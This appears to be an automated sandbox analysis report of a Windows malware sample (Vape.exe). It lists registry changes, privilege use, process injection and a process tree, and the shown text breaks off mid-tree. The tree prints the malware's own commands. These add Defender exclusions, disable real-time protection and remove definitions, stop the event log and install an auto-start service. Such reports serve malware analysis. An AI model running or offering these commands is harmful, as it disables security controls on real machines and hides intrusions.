Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={27F02AA9-5520-40A1-A2DB-02DBD72DA83A}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property | mousocoreworker.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek | mousocoreworker.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 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 | mousocoreworker.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | mousocoreworker.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | mousocoreworker.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows | mousocoreworker.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion | mousocoreworker.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 22 May 2024 13:40:16 GMT" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | dialer.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Modifies registry class 5 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | Microsoft_Protection.exe
Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory | RuntimeBroker.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid process: 1736 powershell.exe; 1736 powershell.exe; 2172 powershell.exe; 2172 powershell.exe; 2172 powershell.exe; 1736 powershell.exe; 1864 powershell.exe; 1864 powershell.exe; 1864 powershell.exe; 1736 powershell.exe; 1736 powershell.exe; 1736 powershell.exe; 400 Microsoft_crypt.exe; 4316 powershell.exe; 4316 powershell.exe; 4316 powershell.exe; 3620 Intoref.exe; 3620 Intoref.exe; 400 Microsoft_crypt.exe; 400 Microsoft_crypt.exe; 400 Microsoft_crypt.exe; 400 Microsoft_crypt.exe; 400 Microsoft_crypt.exe; 400 Microsoft_crypt.exe; 400 Microsoft_crypt.exe; 5716 dialer.exe; 5716 dialer.exe; 3228 powershell.exe; 3228 powershell.exe; 636 powershell.exe; 636 powershell.exe; 400 Microsoft_crypt.exe; 3228 powershell.exe; 636 powershell.exe; 400 Microsoft_crypt.exe; 400 Microsoft_crypt.exe; 5768 powershell.exe; 5768 powershell.exe; 6684 lhhsgwktkatl.exe; 6460 powershell.exe; 6460 powershell.exe; 6700 powershell.exe; 6700 powershell.exe; 6736 powershell.exe; 6736 powershell.exe; 5768 powershell.exe; 6460 powershell.exe; 6700 powershell.exe; 6736 powershell.exe; 3620 Intoref.exe; 3620 Intoref.exe; 3620 Intoref.exe; 3620 Intoref.exe; 3620 Intoref.exe; 3620 Intoref.exe; 3620 Intoref.exe; 3620 Intoref.exe; 3620 Intoref.exe; 3620 Intoref.exe; 3620 Intoref.exe; 3620 Intoref.exe; 3620 Intoref.exe; 3620 Intoref.exe; 3620 Intoref.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process: 6704 msedge.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 1884 | Msvchost.exe
Token: SeDebugPrivilege | 380 | tasklist.exe
Token: SeIncreaseQuotaPrivilege | 4928 | WMIC.exe
Token: SeSecurityPrivilege | 4928 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 4928 | WMIC.exe
Token: SeLoadDriverPrivilege | 4928 | WMIC.exe
Token: SeSystemProfilePrivilege | 4928 | WMIC.exe
Token: SeSystemtimePrivilege | 4928 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 4928 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 4928 | WMIC.exe
Token: SeCreatePagefilePrivilege | 4928 | WMIC.exe
Token: SeBackupPrivilege | 4928 | WMIC.exe
Token: SeRestorePrivilege | 4928 | WMIC.exe
Token: SeShutdownPrivilege | 4928 | WMIC.exe
Token: SeDebugPrivilege | 4928 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 4928 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 4928 | WMIC.exe
Token: SeUndockPrivilege | 4928 | WMIC.exe
Token: SeManageVolumePrivilege | 4928 | WMIC.exe
Token: 33 | 4928 | WMIC.exe
Token: 34 | 4928 | WMIC.exe
Token: 35 | 4928 | WMIC.exe
Token: 36 | 4928 | WMIC.exe
Token: SeDebugPrivilege | 1736 | powershell.exe
Token: SeDebugPrivilege | 2172 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 4928 | WMIC.exe
Token: SeSecurityPrivilege | 4928 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 4928 | WMIC.exe
Token: SeLoadDriverPrivilege | 4928 | WMIC.exe
Token: SeSystemProfilePrivilege | 4928 | WMIC.exe
Token: SeSystemtimePrivilege | 4928 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 4928 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 4928 | WMIC.exe
Token: SeCreatePagefilePrivilege | 4928 | WMIC.exe
Token: SeBackupPrivilege | 4928 | WMIC.exe
Token: SeRestorePrivilege | 4928 | WMIC.exe
Token: SeShutdownPrivilege | 4928 | WMIC.exe
Token: SeDebugPrivilege | 4928 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 4928 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 4928 | WMIC.exe
Token: SeUndockPrivilege | 4928 | WMIC.exe
Token: SeManageVolumePrivilege | 4928 | WMIC.exe
Token: 33 | 4928 | WMIC.exe
Token: 34 | 4928 | WMIC.exe
Token: 35 | 4928 | WMIC.exe
Token: 36 | 4928 | WMIC.exe
Token: SeDebugPrivilege | 512 | tasklist.exe
Token: SeDebugPrivilege | 1864 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2136 | WMIC.exe
Token: SeSecurityPrivilege | 2136 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 2136 | WMIC.exe
Token: SeLoadDriverPrivilege | 2136 | WMIC.exe
Token: SeSystemProfilePrivilege | 2136 | WMIC.exe
Token: SeSystemtimePrivilege | 2136 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 2136 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 2136 | WMIC.exe
Token: SeCreatePagefilePrivilege | 2136 | WMIC.exe
Token: SeBackupPrivilege | 2136 | WMIC.exe
Token: SeRestorePrivilege | 2136 | WMIC.exe
Token: SeShutdownPrivilege | 2136 | WMIC.exe
Token: SeDebugPrivilege | 2136 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 2136 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 2136 | WMIC.exe
Token: SeUndockPrivilege | 2136 | WMIC.exe
Suspicious use of SetWindowsHookEx 22 IoCs
Processes:
pid process: 7468 Conhost.exe; 5996 Conhost.exe; 7636 Conhost.exe; 8064 Conhost.exe; 8172 Conhost.exe; 4724 Conhost.exe; 7176 Conhost.exe; 512 Conhost.exe; 6224 Conhost.exe; 2828 Conhost.exe; 7420 Conhost.exe; 7952 Conhost.exe; 8168 Conhost.exe; 5768 Conhost.exe; 7208 Conhost.exe; 7888 Conhost.exe; 2124 Conhost.exe; 2372 Conhost.exe; 5360 Conhost.exe; 7680 Conhost.exe; 5352 Conhost.exe; 2652 Conhost.exe
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process: 3604 Explorer.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 1716 wrote to memory of 4828 | 1716 | Vape.exe | Microsoft_Protection.exe
PID 1716 wrote to memory of 4828 | 1716 | Vape.exe | Microsoft_Protection.exe
PID 1716 wrote to memory of 4828 | 1716 | Vape.exe | Microsoft_Protection.exe
PID 1716 wrote to memory of 400 | 1716 | Vape.exe | Microsoft_crypt.exe
PID 1716 wrote to memory of 400 | 1716 | Vape.exe | Microsoft_crypt.exe
PID 1716 wrote to memory of 2852 | 1716 | Vape.exe | Microsoft_R.exe
PID 1716 wrote to memory of 2852 | 1716 | Vape.exe | Microsoft_R.exe
PID 2852 wrote to memory of 4692 | 2852 | Microsoft_R.exe | Microsoft_R.exe
PID 2852 wrote to memory of 4692 | 2852 | Microsoft_R.exe | Microsoft_R.exe
PID 4828 wrote to memory of 3928 | 4828 | Microsoft_Protection.exe | WScript.exe
PID 4828 wrote to memory of 3928 | 4828 | Microsoft_Protection.exe | WScript.exe
PID 4828 wrote to memory of 3928 | 4828 | Microsoft_Protection.exe | WScript.exe
PID 1716 wrote to memory of 3600 | 1716 | Vape.exe | Microsoft_M.exe
PID 1716 wrote to memory of 3600 | 1716 | Vape.exe | Microsoft_M.exe
PID 1716 wrote to memory of 1884 | 1716 | Vape.exe | Msvchost.exe
PID 1716 wrote to memory of 1884 | 1716 | Vape.exe | Msvchost.exe
PID 3600 wrote to memory of 4700 | 3600 | Microsoft_M.exe | Microsoft_M.exe
PID 3600 wrote to memory of 4700 | 3600 | Microsoft_M.exe | Microsoft_M.exe
PID 4692 wrote to memory of 2240 | 4692 | Microsoft_R.exe | cmd.exe
PID 4692 wrote to memory of 2240 | 4692 | Microsoft_R.exe | cmd.exe
PID 4692 wrote to memory of 4176 | 4692 | Microsoft_R.exe | cmd.exe
PID 4692 wrote to memory of 4176 | 4692 | Microsoft_R.exe | cmd.exe
PID 4692 wrote to memory of 444 | 4692 | Microsoft_R.exe | cmd.exe
PID 4692 wrote to memory of 444 | 4692 | Microsoft_R.exe | cmd.exe
PID 4692 wrote to memory of 2516 | 4692 | Microsoft_R.exe | cmd.exe
PID 4692 wrote to memory of 2516 | 4692 | Microsoft_R.exe | cmd.exe
PID 444 wrote to memory of 380 | 444 | cmd.exe | tasklist.exe
PID 444 wrote to memory of 380 | 444 | cmd.exe | tasklist.exe
PID 2240 wrote to memory of 2172 | 2240 | cmd.exe | powershell.exe
PID 2240 wrote to memory of 2172 | 2240 | cmd.exe | powershell.exe
PID 2516 wrote to memory of 4928 | 2516 | cmd.exe | WMIC.exe
PID 2516 wrote to memory of 4928 | 2516 | cmd.exe | WMIC.exe
PID 4176 wrote to memory of 1736 | 4176 | cmd.exe | powershell.exe
PID 4176 wrote to memory of 1736 | 4176 | cmd.exe | powershell.exe
PID 4692 wrote to memory of 4788 | 4692 | Microsoft_R.exe | cmd.exe
PID 4692 wrote to memory of 4788 | 4692 | Microsoft_R.exe | cmd.exe
PID 4788 wrote to memory of 2008 | 4788 | cmd.exe | reg.exe
PID 4788 wrote to memory of 2008 | 4788 | cmd.exe | reg.exe
PID 4700 wrote to memory of 2832 | 4700 | Microsoft_M.exe | cmd.exe
PID 4700 wrote to memory of 2832 | 4700 | Microsoft_M.exe | cmd.exe
PID 4700 wrote to memory of 2516 | 4700 | Microsoft_M.exe | cmd.exe
PID 4700 wrote to memory of 2516 | 4700 | Microsoft_M.exe | cmd.exe
PID 4700 wrote to memory of 4776 | 4700 | Microsoft_M.exe | cmd.exe
PID 4700 wrote to memory of 4776 | 4700 | Microsoft_M.exe | cmd.exe
PID 4700 wrote to memory of 4996 | 4700 | Microsoft_M.exe | cmd.exe
PID 4700 wrote to memory of 4996 | 4700 | Microsoft_M.exe | cmd.exe
PID 4692 wrote to memory of 2000 | 4692 | Microsoft_R.exe | cmd.exe
PID 4692 wrote to memory of 2000 | 4692 | Microsoft_R.exe | cmd.exe
PID 4776 wrote to memory of 512 | 4776 | cmd.exe | tasklist.exe
PID 4776 wrote to memory of 512 | 4776 | cmd.exe | tasklist.exe
PID 2832 wrote to memory of 1864 | 2832 | cmd.exe | powershell.exe
PID 2832 wrote to memory of 1864 | 2832 | cmd.exe | powershell.exe
PID 2516 wrote to memory of 1736 | 2516 | cmd.exe | powershell.exe
PID 2516 wrote to memory of 1736 | 2516 | cmd.exe | powershell.exe
PID 4996 wrote to memory of 2136 | 4996 | cmd.exe | tree.com
PID 4996 wrote to memory of 2136 | 4996 | cmd.exe | tree.com
PID 2000 wrote to memory of 3576 | 2000 | cmd.exe | Conhost.exe
PID 2000 wrote to memory of 3576 | 2000 | cmd.exe | Conhost.exe
PID 1884 wrote to memory of 4040 | 1884 | Msvchost.exe | schtasks.exe
PID 1884 wrote to memory of 4040 | 1884 | Msvchost.exe | schtasks.exe
PID 4692 wrote to memory of 2644 | 4692 | Microsoft_R.exe | cmd.exe
PID 4692 wrote to memory of 2644 | 4692 | Microsoft_R.exe | cmd.exe
PID 4700 wrote to memory of 2408 | 4700 | Microsoft_M.exe | cmd.exe
PID 4700 wrote to memory of 2408 | 4700 | Microsoft_M.exe | cmd.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Each entry gives the image path, then the command line, then any signatures hit by that process; child processes are indented under their parent.
- C:\Windows\system32\winlogon.exe | winlogon.exe
  - C:\Windows\system32\dwm.exe | "dwm.exe"
- C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | Drops file in System32 directory
  - C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  - C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe | C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe | Executes dropped EXE
  - C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe | C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | Drops file in System32 directory
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  - C:\Windows\system32\sihost.exe | sihost.exe
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | Drops file in System32 directory
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
- C:\Windows\sysmon.exe | C:\Windows\sysmon.exe
- C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
- C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | Suspicious use of UnmapMainImage
  - C:\Users\Admin\AppData\Local\Temp\Vape.exe | "C:\Users\Admin\AppData\Local\Temp\Vape.exe" | Checks computer location settings; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe | "C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe" | Checks computer location settings; Executes dropped EXE; Modifies registry class; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Webdriversession\gI2DkJwTD.vbe" | Checks computer location settings
        - C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Webdriversession\SoPkc.bat" "
          - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          - C:\Webdriversession\Intoref.exe | "C:\Webdriversession\Intoref.exe" | Checks computer location settings; Executes dropped EXE; Drops file in Program Files directory; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses
            - C:\Webdriversession\msedge.exe | "C:\Webdriversession\msedge.exe" | Executes dropped EXE; Suspicious behavior: GetForegroundWindowSpam
    - C:\Users\Admin\AppData\Local\Temp\Microsoft_crypt.exe | "C:\Users\Admin\AppData\Local\Temp\Microsoft_crypt.exe" | Executes dropped EXE; Drops file in System32 directory; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
      - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        - C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart
      - C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      - C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      - C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      - C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      - C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | Suspicious behavior: EnumeratesProcesses
      - C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe delete "QHRAJGDI" | Launches sc.exe
        - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe create "QHRAJGDI" binpath= "C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe" start= "auto" | Launches sc.exe
      - C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop eventlog | Launches sc.exe
      - C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe start "QHRAJGDI" | Launches sc.exe
        - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe | "C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe" | Executes dropped EXE; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe | "C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe" | Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe'" | Suspicious use of WriteProcessMemory
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe' | Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" | Suspicious use of WriteProcessMemory
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend | Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" | Suspicious use of WriteProcessMemory
          - C:\Windows\system32\tasklist.exe | tasklist /FO LIST | Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" | Suspicious use of WriteProcessMemory
          - C:\Windows\System32\Wbem\WMIC.exe | wmic csproduct get uuid | Suspicious use of AdjustPrivilegeToken
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" | Suspicious use of WriteProcessMemory
          - C:\Windows\system32\reg.exe | REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" | Suspicious use of WriteProcessMemory
          - C:\Windows\system32\reg.exe | REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          - C:\Windows\System32\Wbem\WMIC.exe | wmic path win32_VideoController get name | Detects videocard installed
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          - C:\Windows\System32\Wbem\WMIC.exe | wmic path win32_VideoController get name | Detects videocard installed
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          - C:\Windows\system32\tasklist.exe | tasklist /FO LIST | Enumerates processes with tasklist
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          - C:\Windows\system32\tasklist.exe | tasklist /FO LIST | Enumerates processes with tasklist
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
